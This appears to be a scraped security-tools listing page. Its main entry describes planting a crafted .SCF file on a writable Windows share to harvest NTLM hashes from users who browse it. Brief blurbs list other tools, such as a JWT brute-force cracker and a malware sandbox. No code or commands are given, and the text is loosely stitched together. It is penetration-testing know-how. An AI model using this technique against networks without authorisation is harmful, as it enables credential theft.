Using a SCF file to Gather Hashes

A Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.

Have You Ever Encountered

Have you ever participated in an internal network assessment and found an unauthenticated writable Windows-based file share? In addition to potentially uncovering sensitive information, this situation can be exploited to collect user hashes from individuals browsing the file share. In this type of attack, a specially crafted file with a .SCF extension is placed onto the file share. SCF files can manipulate Windows Explorer; however, in this scenario, we use one to trick an unsuspecting user into revealing their NTLMv1/2 hash to us, the attacker.

Other AI Tools

RTFSig

A simple JWT token brute force cracker

Details

Reversing With Lena (Tutorials)

Falcon Sandbox is a malware analysis framework that provides in-depth static and dynamic analysis of files, offering hybrid analysis, behavior indicators, and integrations with various security tools.

Details